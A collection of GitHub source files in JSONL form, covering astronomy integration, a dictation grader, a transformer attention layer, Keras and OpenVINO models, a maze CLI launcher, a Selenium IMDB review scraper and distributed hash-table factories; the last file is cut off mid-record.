+{"seq_id":"4010444781","text":"from scipy.integrate import quad\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef integrand_theta(theta, rho,R,sigma):\t# Integration with respect to theta\n return np.exp(2*rho*R*np.cos(theta) / 2*sigma**2)\n\ndef integrand_R(R,rho,sigma):\t\t\t# Integration with respect to R \n return R*np.exp(-R**2 / 2*sigma**2)*quad(integrand_theta, 0, 2*np.pi, args=(rho,R,sigma))[0]*np.exp(-rho**2 / 2*sigma**2)\n\ndef main():\n\n\tFWHM\t\t= 1.7\t# FWHM in Cross dispersion direction p.56 COS manual\n\tR \t= 1.25\t# Aperture size. R = Diameter of 2.5\"/2 = 1.25\"\n\t\n\tsigma \t= FWHM/ 2*np.sqrt(2*np.log(2))\t# Convert from FWHM --> sigma\n\trho \t= np.arange(0,1.5,0.1)\t\t\t# [arcsec]\n\n\tflux\t= []\n\tshift\t= []\n\n\tfor i in range(len(rho)):\n\t\tflux.append(quad(integrand_R, 0, R, args=(rho[i],sigma))[0])\n\t\tshift.append(rho[i])\n\t\n\tflux = np.array(flux)\n\tshift = np.array(shift)\n\t\n\tplt.plot(shift,flux/flux[0],'-k')\n\tplt.ylabel('Flux loss')\n\tplt.xlabel('Arsecond shift away from central position')\n\tplt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"lecaveli/betapic","sub_path":"theoretical_flux_loss.py","file_name":"theoretical_flux_loss.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36115748112","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport re\nimport os\nimport sys\nimport json\nimport argparse\nimport glob\nimport time\nimport codecs\n\n__version__ = 'v0.0.1'\nglobal codes\ncodes = ['correct', 'wrong', 'typo', 'plenty', 'captial']\n\ndef init():\n with open('data.json') as fd:\n global data\n data = json.load(fd)\n\ndef getWord(tag, ind, direc):\n global data\n if direc == 'horizontal':\n return data[tag]['words'][ind]\n if direc == 'vertical':\n stride = data[tag]['stride']\n row = (len(data[tag]['words'])+stride-1)/stride\n rest = len(data[tag]['words'])%stride\n if rest==0:\n rest = stride\n if ind5 or wd<=3 and len(s)>8:\n return codes[2]\n return codes[1]\n\n\ndef match(t, d, p):\n tot = 0\n cor = 0\n for i, w in enumerate(p):\n tot+=1\n s = getWord(t, i, d)\n if checkOne(w, s)!='wrong':\n cor+=1\n if tot>20: break\n if cor>3:\n return True\n else:\n return False\n\ndef guess(p):\n global data\n for k in data:\n for d in ['horizontal', 'vertical']:\n if match(k, d, p):\n return k, d\n return None, None\n\ndef getAnalysis(w):\n return '//'\n\ndef correct(p, direction = 'auto', test = ''):\n with open(p) as fd:\n lines = fd.readlines()\n lines = filter(lambda x: x!='', map(lambda x: x.decode('utf-8').strip(), lines))\n tag, direc = guess(lines)\n t = test\n d = direction\n if t!='':\n tag = t\n if d!='auto':\n direc = d\n if tag is None or direc is None:\n raise ValueError('cannot determine which test, please choose one.')\n ind = 0\n marks = {c: [] for c in codes}\n for line in lines:\n if ind>=len(data[tag]['words']): break\n ans = getWord(tag, ind, direc)\n sol = re.split(r'[\\s]+', line)[0]\n code = checkOne(sol, ans)\n marks[code].append((sol, ans))\n ind += 1\n ags = [[0], [2,3,4], [1]]\n res = []\n tot = len(data[tag]['words'])\n for ag in ags:\n sum_ = sum([len(marks[codes[a]]) for a in ag])\n res += [sum_, sum_*100./tot]\n res = tuple([p] + res)\n tstamp = time.strftime(r'%Y%m%d%H%M%S', time.localtime(int(time.time())))\n tout = sys.stdout\n rname = '%s-%s-[%s].report'%(tag, direc, tstamp)\n sys.stdout = codecs.open(rname, 'w', 'utf-8')\n print('Testpaper [%s]: correct %d(%.1f%%), almost correct %d(%.1f%%), wrong %d(%.1f%%)'%res)\n for code in codes[1:]:\n print('Err Type [%s]'%code)\n if len(marks[code]):\n for w in marks[code]:\n analysis = getAnalysis(w[1])\n print('\\t[x] %s => %s [√], %s'%(w[0], w[1], analysis))\n else:\n print('\\tNone')\n print('--End of report.')\n sys.stdout.close()\n sys.stdout = tout\n with codecs.open(rname, 'r', 'utf-8') as fd:\n for line in fd.readlines():\n print(line, end='')\n report = {'date': tstamp, 'test': tag, 'direction': direc, 'testpaper': p, 'delta': marks}\n rname = '%s-%s-[%s].json'%(tag, direc, tstamp)\n with open(rname, 'w') as fd:\n json.dump(report, fd, indent = 2)\n return report\n\nif __name__ == \"__main__\":\n init()\n parser = argparse.ArgumentParser('judger.py ', description = 'dictation judger %s'%__version__, version = __version__)\n parser.add_argument('testpaper', type = str, nargs = '+', help = 'testpaper to be judged')\n parser.add_argument('-d', '--direction', choices = ['horizontal', 'vertical', 'auto'], default = 'auto', help = 'choose direction')\n parser.add_argument('-t', '--test', type = str, choices = data.keys() + [''], default = '', help = 'specify a test')\n parser.add_argument('-l', '--list', action = \"store_true\", help = 'list all tests')\n args = parser.parse_args()\n if args.list:\n for i in 
data:\n print(i)\n exit(0)\n for tp in args.testpaper:\n for ttp in glob.glob(tp):\n correct(ttp, direction = args.direction, test = args.test)\n","repo_name":"Helicopt/DictationProject","sub_path":"judger.py","file_name":"judger.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74398220070","text":"import math\n\nimport torch\nfrom torch import nn\n\n\nclass ScaledDotProductAttention(nn.Module):\n\n def __init__(self):\n \"\"\"scaled dot product attention 구현 클래스\"\"\"\n\n super().__init__()\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, \n q: torch.Tensor, \n k: torch.Tensor, \n v: torch.Tensor, \n mask: torch.Tensor=None):\n \"\"\"forward 함수\n\n Args:\n q (torch.Tensor(bs, head, len_q, d_k)): query\n k (torch.Tensor(bs, head, len_k, d_k)): key\n v (torch.Tensor(bs, head, len_k, d_v)): value\n mask (torch.Tenso(bs, 1, len_q, len_k)): masking idx\n\n Returns:\n output (torch.Tensor(bs, head, len_q, d_v)): forward 결과값\n \"\"\"\n\n d_k = k.size(dim=-1)\n\n weight = (q @ k.transpose(-1, -2)) / math.sqrt(d_k)\n\n if mask is not None:\n weight.masked_fill(mask==False, -1e12)\n\n scale_weight = self.softmax(weight)\n\n output = scale_weight @ v\n\n return output","repo_name":"GJ98/transformer","sub_path":"transformer/attentions/scaled_dot_product_attention.py","file_name":"scaled_dot_product_attention.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"38626244425","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport re\nfrom argparse import ArgumentParser\nfrom os import environ\n\nCONFIG_REGEX = re.compile(r\"@(\\w+)@\")\n\nparser = ArgumentParser()\n\nparser.add_argument('input_file', type=str)\nparser.add_argument('output_file', type=str)\n\nargs = parser.parse_args()\n\nwith open(args.input_file, encoding='utf8') as in_file, open(args.output_file, 'w', encoding='utf8') as out_file:\n for line in in_file.readlines():\n start_pos = 0\n while start_pos < len(line):\n match = CONFIG_REGEX.search(line, start_pos)\n if not match:\n break\n value = environ[match.group(1)]\n line = line[:match.start()] + value + line[match.end():]\n start_pos = match.end()\n out_file.write(line)\n","repo_name":"JacobJBublitz/RenderTests","sub_path":"tools/header_config.py","file_name":"header_config.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71071509350","text":"from __future__ import absolute_import, division, print_function\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\ndataset = pd.read_pickle('dfTotal.pickle')\n#reset the index\ndataset = dataset.reset_index()\n#keep only a few columns\ncolList = ['isBachelor', 'numInSeason', 'year', 'viewers(millions)']\ndataset = dataset[colList]\n\n\ntrain_dataset = dataset.sample(frac=0.6,random_state=0)\ntest_cv_dataset = dataset.drop(train_dataset.index)\ntest_dataset = test_cv_dataset.sample(frac=0.5, random_state=0)\ncv_dataset = test_cv_dataset.drop(test_dataset.index)\nsns.pairplot(train_dataset[colList], diag_kind=\"kde\")\n\ntrain_stats = train_dataset.describe()\ntrain_stats.pop(\"viewers(millions)\")\ntrain_stats = train_stats.transpose()\ntrain_stats\n\ntrain_labels = train_dataset.pop('viewers(millions)')\ntest_labels = test_dataset.pop('viewers(millions)')\n\ndef norm(x):\n return (x - train_stats['mean']) / train_stats['std']\nnormed_train_data = norm(train_dataset)\nnormed_test_data = norm(test_dataset)\n\ndef build_model():\n model = keras.Sequential([\n layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_dataset.keys())]),\n layers.Dense(64, activation=tf.nn.relu),\n layers.Dense(1)\n ])\n\n optimizer = tf.keras.optimizers.RMSprop(0.001)\n\n model.compile(loss='mean_squared_error',\n optimizer=optimizer,\n metrics=['mean_absolute_error', 'mean_squared_error'])\n return model\n\nmodel = build_model()\n\n# Display training progress by printing a single dot for each completed epoch\nclass PrintDot(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n if epoch % 100 == 0: print('')\n print('.', end='')\n\nEPOCHS = 1000\n# The patience parameter is the amount of epochs to check for improvement\nearly_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)\nhistory = model.fit(\n normed_train_data, train_labels,\n epochs=EPOCHS, validation_split = 0.2, verbose=0,\n callbacks=[early_stop, PrintDot()])\n\ndef plot_history(history):\n hist = pd.DataFrame(history.history)\n hist['epoch'] = history.epoch\n \n plt.figure()\n plt.xlabel('Epoch')\n plt.ylabel('Mean Square Error [$viewers(millions)^2$]')\n plt.plot(hist['epoch'], hist['mean_squared_error'],\n label='Train Error')\n plt.plot(hist['epoch'], hist['val_mean_squared_error'],\n label = 'Val Error')\n plt.legend()\n plt.show()\n\nplot_history(history)\n\nloss, mae, mse = model.evaluate(normed_test_data, test_labels, verbose=1)\n\nprint(\"Testing set Mean Abs Error: {:5.2f} viewers(millions)\".format(mae))\n\ntest_predictions = model.predict(normed_test_data).flatten()\nplt.figure()\nax = plt.scatter(test_labels, test_predictions)\nplt.xlabel('True Values [viewers(millions)]')\nplt.ylabel('Predictions [viewers(millions)]')\nplt.axis('equal')\nplt.axis('square')\nplt.xlim([0,plt.xlim()[1]])\nplt.ylim([0,plt.ylim()[1]])\nax = plt.plot([-100, 100], [-100, 100])\nplt.figure()\nerror = test_predictions - test_labels\nax1 = plt.hist(error, bins = 25)\nplt.xlabel(\"Prediction Error [viewers(millions)]\")\nplt.ylabel(\"Count\")","repo_name":"jlaw8504/alphaPRAW","sub_path":"debugScript.py","file_name":"debugScript.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6066164503","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 13:34:41 2019\n\nThis program computes the length of a semicircle \nby considering it as a number of straight sections joined together.\n\n@author: shane\n\"\"\"\n#-----------------------------------------------------------------------------#\nimport numpy as np\n\ndef f(x):\n return np.sqrt(np.abs(1-(x*x)))\n#-----------------------------------------------------------------------------#\n\ndef new_length(x, dx, c_y):\n y1 = f(x)\n y2 = f(x + dx)\n new_y = y2 - f(c_y)\n return np.sqrt(((dx)**2)+((y2 - y1)**2))\n#-----------------------------------------------------------------------------#\n\nr = int(input(\"Enter the radius of the semicircle: \"))\nn = int(input(\"Enter number of n sections to compute (accuracy): \"))\n\nc_length = 0\nx = 0\n\ndx = float(r/n)\n\nfor i in range(0,n):\n x = i*dx\n c_y = f(x - dx)\n c_length += new_length(x, dx, c_y)\n c_length += c_length*2\n\nprint(c_length)","repo_name":"Smullle/ComputationalPhysics","sub_path":"Lab6/ep305curve_lengthOdd.py","file_name":"ep305curve_lengthOdd.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8253072543","text":"\nfrom openvino.inference_engine import IENetwork, IECore\nimport cv2\nimport logging as log\nimport numpy as np\nfrom model_module import Model\n\nclass FaceDetection(Model):\n \"\"\"Class for the Face Detection Model.\"\"\"\n\n def __init__(self, model_name, device, threshold):\n \"\"\" Initialise and loads the face detecion model\"\"\"\n\n super(FaceDetection, self).__init__(model_name, device, threshold)\n\n def predict(self, image):\n \"\"\"Performs inference on image and returns list of faces.\"\"\"\n\n width = image.shape[1]\n height = image.shape[0]\n \n image = self.preprocess_input(image)\n assert len(image.shape) == 4, \"Image shape should be [1, c, h, w]\"\n assert image.shape[0] == 1\n assert image.shape[1] == 3\n\n input_dict={self.input_blob:image}\n \n #------async inference ---\n infer_request_handle = self.net.start_async(request_id=0, inputs=input_dict)\n if self.net.requests[0].wait(-1) == 0:\n res = infer_request_handle.outputs[self.output_blob]\n \n # -----sync inference ----\n # res = self.net.infer(input_dict)\n # res = res[self.output_blob]\n \n output_data = res[0][0]\n rois = []\n for _, proposal in enumerate(output_data):\n if proposal[2] > 0.5:\n xmin = np.int(width * proposal[3])\n ymin = np.int(height * proposal[4])\n xmax = np.int(width * proposal[5])\n ymax = np.int(height * proposal[6])\n rois.append([xmin,ymin,xmax,ymax])\n return rois\n\n def preprocess_output(self, image, rois):\n \"\"\"\n Crops first face from image and returns it.\n \n Args:\n image -- the ndarray image.\n rois -- the list of faces detected from inference.\n \n Returns:\n cropped_roi -- cropped face region of interest.\n \"\"\"\n # assert len(rois) != 0, \"No face detected in the frame.\"\n log.info(msg= '{} face/s detected..'.format(len(rois)))\n\n #roi = im[y1:y2, x1:x2]\n cropped_roi = image[rois[0][1]: rois[0][3], rois[0][0]:rois[0][2]]\n\n return cropped_roi\n ","repo_name":"Jarnen/Computer-Pointer-Controller","sub_path":"src/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34370180231","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os.path\nimport os\n\ndef main():\n print(\"*=========================================*\")\n print(\"* MAZE GENERATOR/SOLVER *\")\n print(\"*=========================================*\")\n print()\n\n check_for_binaries()\n\n generate_call, unsolved = get_generation_call()\n solve_call = get_solve_call(unsolved)\n\n subprocess.call(generate_call.split())\n subprocess.call(solve_call.split())\n\n\ndef get_generation_call():\n print(\"How many rows (0 for maximum)?\")\n rows = check_range(0, 100)\n\n print(\"How many cols (0 for maximum)?\")\n cols = check_range(0, 200)\n\n print(\"Select a generation algorithm:\")\n print(\"1) Randomized Prim's\")\n print(\"2) Randomized Depth-First Search\")\n print(\"3) Randomized Kruskal's\")\n generation_alg = check_range(1, 3)\n\n print(\"Would you like to animate maze generation (y/n)?\")\n animate_generation = yes_or_no()\n\n speed = 0\n if animate_generation:\n print(\"Enter animation speed (delay in milliseconds)\")\n speed = check_range(0, 10000);\n\n print(\"Please enter a filename to save the unsolved maze to\")\n filename = get_filename(\"unsolved.txt\")\n\n generators = ['prims', 'dfs', 'kruskals']\n\n generate_call = \"./generator_driver\"\n generate_call += \" --algorithm={}\".format(generators[generation_alg-1])\n generate_call += \" --file={}\".format(filename)\n generate_call += \" --animate\" if animate_generation else \"\"\n generate_call += \" --speed={}\".format(speed if speed > 0 else \"0\")\n generate_call += \" --rows={}\".format(rows) if rows > 0 else \"\"\n generate_call += \" --cols={}\".format(cols) if cols > 0 else \"\"\n\n return generate_call, filename\n\n\ndef get_solve_call(input_file):\n print(\"Select a solving algorithm\")\n print(\"1) Player Controlled\")\n print(\"2) Recursive Backtracking\")\n print(\"3) Breadth-First Search\")\n print(\"4) Depth-First Search\")\n print(\"5) A*\")\n solve_alg = check_range(1, 5)\n\n speed = 0\n if solve_alg != 1:\n print(\"Would you like to animate maze solving (y/n)?\")\n # animate_solve = True if input(\">>>\") == 'y' else False\n animate_solve = yes_or_no()\n if animate_solve:\n print(\"Enter animation speed (delay in milliseconds)\")\n speed = check_range(0, 10000);\n else:\n animate_solve = True\n\n print(\"Please enter a filename to save the solved maze to\")\n output_file = get_filename(\"solved.txt\")\n\n solvers = ['play', 'bt', 'bfs', 'dfs', 'astar']\n\n solve_call = \"./solver_driver\"\n solve_call += \" --algorithm={}\".format(solvers[solve_alg-1])\n solve_call += \" --animate\" if animate_solve else \"\"\n solve_call += \" --speed={}\".format(speed if speed > 0 else \"0\")\n solve_call += \" --infile={}\".format(input_file)\n solve_call += \" --outfile={}\".format(output_file)\n\n return solve_call\n\n\ndef check_range(lower, upper):\n while True:\n val = input(\">>>\")\n if not val:\n return lower\n try:\n val = int(val)\n if (val < lower) or (val > upper):\n raise ValueError()\n return val\n except ValueError:\n error_msg = \"ERROR: Please choose a number\"\n error_msg += \" between {} and {}\".format(lower, upper)\n print(error_msg)\n\n\ndef yes_or_no():\n while True:\n val = input(\">>>\")\n if not val:\n return True\n if val.lower()[0] not in 'yn':\n error_msg = \"ERROR: Please choose [y]es or [n]o \"\n print(error_msg)\n else:\n return val[0] == 'y'\n\n\ndef check_for_binaries():\n generator_exists = os.path.isfile(\"./generator_driver\")\n solver_exists = 
os.path.isfile(\"./solver_driver\")\n if not (generator_exists and solver_exists):\n print(\"At least one of the necessary binaries does not exist\")\n print(\"Attempt to resolve?\")\n if yes_or_no():\n make_command = \"make > /dev/null\"\n FNULL = open(os.devnull, 'w')\n subprocess.call(make_command.split(), stdout=FNULL, stderr=FNULL)\n\n generator_exists = os.path.isfile(\"./generator_driver\")\n solver_exists = os.path.isfile(\"./solver_driver\")\n if not (generator_exists and solver_exists):\n print(\"Could not resolve. Try running make?\")\n raise Exception(\"Please consult repo owner\")\n else:\n print(\"\\n=== Successfully built binaries ===\\n\")\n\n\ndef get_filename(default):\n val = input(\">>>\")\n if not val:\n return default\n else:\n return val\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"\\rGoodbye!\")\n except Exception as e:\n print(e)\n","repo_name":"ian-howell/Mazes","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"71"}
+{"seq_id":"10752246541","text":"\"\"\"Provides the PropertyTypes class.\"\"\"\n\nfrom datetime import datetime, timedelta\n\nNoneType = type(None)\n\n\nproperty_types = dict(\n null=NoneType,\n bool=bool,\n str=str,\n float=float,\n int=int,\n list=list,\n dict=dict,\n datetime=datetime,\n duration=timedelta\n)\n","repo_name":"chrisnorman7/carehome","sub_path":"carehome/property_types.py","file_name":"property_types.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74840168229","text":"# IMPORTS\n\nimport cv2\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\n# LOADING THE MODEL\n\nmodel = load_model(\"detection_model.h5\")\n\n\ndef face_extraction(frame):\n \"\"\"Detect faces in a frame and extract them\"\"\"\n\n faces = cascade_model.detectMultiScale(frame, 1.1, 5)\n\n for x, y, w, h in faces:\n cropped_img = frame[y : y + h, x : x + w]\n\n return cropped_img\n\n\ndef image_processing(frame):\n \"\"\"Preprocessing of the image for predictions\"\"\"\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (48, 48))\n frame = image.img_to_array(frame)\n frame = frame / 255\n frame = np.expand_dims(frame, axis=0)\n\n return frame\n\n\ndef detect_expressions(frame, detection_model):\n \"\"\"Detect final expressions and return the predictions\n done by the detection_model\"\"\"\n\n cropped_frame = face_extraction(frame)\n\n test_frame = image_processing(cropped_frame)\n\n prediction = np.argmax(model.predict(test_frame), axis=-1)\n\n return prediction\n\n\n# LOAD IMAGE\n\nimg = cv2.imread(\"./test_images/Swift2.jpg\")\n\n\n# LOADING HAAR CASCADE CLASSIFIER\n\ncascade_model = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nfaces = cascade_model.detectMultiScale(img, 1.1, 10)\n\n\nfont = cv2.FONT_ITALIC\nfor x, y, w, h in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n prediction = detect_expressions(img, model)\n\n if prediction == [0]:\n cv2.putText(img, \"Angry\", (x, y), font, 2, (0, 0, 255), 2)\n\n elif prediction == [1]:\n cv2.putText(img, \"Happy\", (x, y), font, 2, (0, 0, 255), 2)\n\n elif prediction == [2]:\n cv2.putText(img, \"Sad\", (x, y), font, 2, (0, 0, 255), 2)\n\n else:\n cv2.putText(img, \"Surprised\", (x, y), font, 2, (0, 0, 255), 2)\n\n cv2.imshow(\"img\", img)\n\n\n# Cleaning\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Python-World/Python_and_the_Web","sub_path":"Scripts/Miscellaneous/Facial Expressions Detection/detection_on_img.py","file_name":"detection_on_img.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":666,"dataset":"github-code","pt":"71"}
+{"seq_id":"34859066391","text":"import random\n\ndef simpleStats(a):\n if len(a) == 0:\n return None\n \n mean = sum(a)/len(a)\n\n b = sorted(a)\n if len(a)%2 == 0:\n median = (b[int(len(a)/2)] + b[int(len(a)/2)-1])/2\n else:\n median = b[int(len(a)/2)]\n\n mode = max(set(a), key=a.count)\n return (mean, median, mode)\n\n\ndef test(tests):\n for i in range(tests):\n lst = makeRandomList()\n print(lst, simpleStats(lst))\n\ndef makeRandomList():\n length = random.randint(1, 10)\n lst = []\n\n for i in range(length):\n lst.append(random.randint(0, 100))\n return lst\n\nprint(simpleStats([3,5,8,2,2]))\n\ntest(10)\n","repo_name":"Amithab/Python_Practice","sub_path":"W5/SimpleStats.py","file_name":"SimpleStats.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18357212968","text":"\n# coding: utf-8\n\n# In[10]:\n\n\nimport os \nimport time\nimport csv\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.chrome.options import Options \n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\") \nchrome_options.binary_location = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe' \n\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\"C:\\\\_files\\\\git\\\\DVA-Project\\\\ChromeDriver\\\\chromedriver.exe\"), options=chrome_options) \n#driver = webdriver.Chrome(executable_path=os.path.relpath(\"..\\chromedriver_win32\\chromedriver.exe\"), options=chrome_options) \n\n\n# In[177]:\n\n\ndef get_imdb_reviews(tt):\n# driver.get(\"https://www.imdb.com/title/tt0056592/reviews?ref_=tt_urv\") \n driver.get(\"https://www.imdb.com/title/\"+tt+\"/reviews\")\n click_count = 0\n while True:\n try:\n load_button = driver.find_element_by_id('load-more-trigger')\n load_button.click()\n click_count = click_count + 1\n print(str(click_count))\n time.sleep(.5)\n continue\n except Exception as e: \n print(\"No more found\")\n print(\"Total Clicks: \" + str(click_count))\n break\n \n # Click on all the spoiler warning controls to expand them\n ctls = driver.find_elements_by_css_selector(\"div.spoiler-warning__control\")\n for idx,elem in enumerate(ctls):\n elem.click()\n \n #reviews = driver.find_elements_by_css_selector(\"div.review-container .content .text\")\n reviews = driver.find_elements_by_css_selector(\"div.review-container\")\n \n output = []\n review_clicks = 0\n\n for idx, review in enumerate(reviews):\n review_text = review.find_element_by_css_selector(\".content .text\")\n if 'clickable' in review_text.get_attribute('class'):\n review_text.click()\n review_clicks = review_clicks + 1\n \n link_elem = review.find_elements_by_class_name(\"title\")\n if len(link_elem) > 0:\n link = link_elem[0].get_attribute(\"href\")\n else:\n link = ''\n \n rating = '?'\n try:\n rating = review.find_elements_by_class_name(\"ipl-ratings-bar\")[0].find_elements_by_tag_name(\"span\")[1].text\n except:\n rating = '?'\n\n output.append((link, rating, review_text.text))\n\n return output\n\n\n# In[ ]:\n\n\ninput_file = '.\\\\tmdb_to_imdb_id_mapping2.csv'\n\nline_count = 0\n\n\nwith open(input_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n with open('movie_reviews.csv', mode='w', encoding='utf8', newline='') as review_file:\n review_writer = csv.writer(review_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n review_writer.writerow(['imdbid', 'reviewid', 'url', 'rating', 'review'])\n for movie in readCSV:\n line_count = line_count + 1\n #Skip header in read\n if line_count == 1:\n continue\n \n #Get the IMDBId\n tt = movie[2]\n if tt == '':\n continue\n\n reviews = get_imdb_reviews(tt)\n for idx, review in enumerate(reviews): \n review_writer.writerow([tt,idx,review[0], review[1], review[2]])\n \n #Wait between movies\n time.sleep(2)\n \n #Hardcoded to only run a few\n # movie_count = 2\n # if line_count > movie_count:\n # break\n\n\n# In[ ]:\n\n\ndriver.close()\n\n","repo_name":"CaptainDylan/Books_Films","sub_path":"Code/Code_For_Dataset/3_MovieDataCollection/ScrapeIMDB.py","file_name":"ScrapeIMDB.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7525723532","text":"from typing import Dict, Iterable, List, Tuple\n\nimport tensorflow as tf\n\nfrom idl.matrix.proto.example_pb2 import OutConfig\nfrom monolith.native_training import distributed_ps\nfrom monolith.native_training import distributed_ps_sync\nfrom monolith.native_training import entry\nfrom monolith.native_training import hash_filter_ops\nfrom monolith.native_training import hash_table_ops\nfrom monolith.native_training import multi_type_hash_table\nfrom monolith.native_training import multi_hash_table_ops\nimport monolith.native_training.embedding_combiners as embedding_combiners\n\n\nclass MultiHashTableFactory:\n\n def __init__(self, hash_filters, sync_clients):\n self._cc_dict = {}\n self.hash_filters = hash_filters\n self.sync_clients = sync_clients\n\n def __call__(self, idx: int, slot_to_config):\n k = id(slot_to_config)\n cc = self._cc_dict.get(k, None)\n if cc is None:\n cc = multi_hash_table_ops.convert_to_cached_config(slot_to_config)\n self._cc_dict[k] = cc\n return multi_hash_table_ops.MultiHashTable.from_cached_config(\n cc=cc,\n hash_filter=self.hash_filters[idx],\n sync_client=self.sync_clients[idx],\n name_suffix=str(idx))\n\n\ndef create_in_worker_multi_type_hash_table(\n shard_num: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filter: tf.Tensor,\n sync_client: tf.Tensor = None,\n queue_configs: Dict[str, int] = None,\n):\n \"\"\"\n Creates a in worker multi-type hash table factory.\n Args:\n shard_num: the number of shards for distributing hash tables.\n \"\"\"\n\n # The logic here is\n # merged_slots -> distributed_fused_multitype_table -> alltoall -> hash_table\n def distributed_multi_type_table_factory(merged_slot_to_config):\n\n def multi_type_table_factory(idx):\n\n def table_factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(\n config=config,\n hash_filter=hash_filter,\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_client)\n\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n table_factory)\n\n return distributed_ps_sync.DistributedMultiTypeHashTableMpi(\n shard_num, multi_type_table_factory, queue_configs)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, distributed_multi_type_table_factory)\n\n\ndef create_multi_type_hash_table(\n num_ps: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filters: List[tf.Tensor],\n sync_clients: List[tf.Tensor] = None,\n reduce_network_packets: bool = False,\n max_rpc_deadline_millis: int = 30,\n):\n \"\"\"Create a distributed multi type hash table.\n Args:\n reduce_network_packets - if True, it will compact all tensors locally so ps will get less load.\n Useful when there are a lot of workers.\n \"\"\"\n if num_ps and sync_clients:\n assert num_ps == len(\n sync_clients\n ), \"Number of PS should be equal to number of sync clients, while got {} vs {}\".format(\n num_ps, len(sync_clients))\n if not sync_clients:\n sync_clients = [None] * max(num_ps, 1)\n\n if num_ps == 0:\n\n def factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(config,\n hash_filter=hash_filters[0],\n name_suffix=name_suffix,\n sync_client=sync_clients[0])\n\n def multi_type_factory(merged_slot_to_config):\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n factory)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, multi_type_factory)\n elif not reduce_network_packets:\n # The logic here is\n # dedup_slots -> 
multi hash table -> distributed_hash_table -> hash_table\n # | worker | ps |\n def multi_type_factory(merged_slot_to_config):\n\n def distributed_factory(name_suffix, config):\n\n def factory(idx, config_on_ps):\n return hash_table_ops.hash_table_from_config(\n config_on_ps,\n hash_filter=hash_filters[idx],\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_clients[idx])\n\n return distributed_ps.DistributedHashTable(num_ps, config, factory)\n\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n distributed_factory)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, multi_type_factory)\n else:\n # The logic here is\n # dedup_slots -> distributed multi hash table -> multi hash table -> hash table\n # | worker | ps |\n def distributed_multi_type_factory(merged_slot_to_config):\n\n def multi_type_factory(idx: int, slot_to_config_on_ps):\n\n def factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(\n config,\n hash_filter=hash_filters[idx],\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_clients[idx])\n\n return 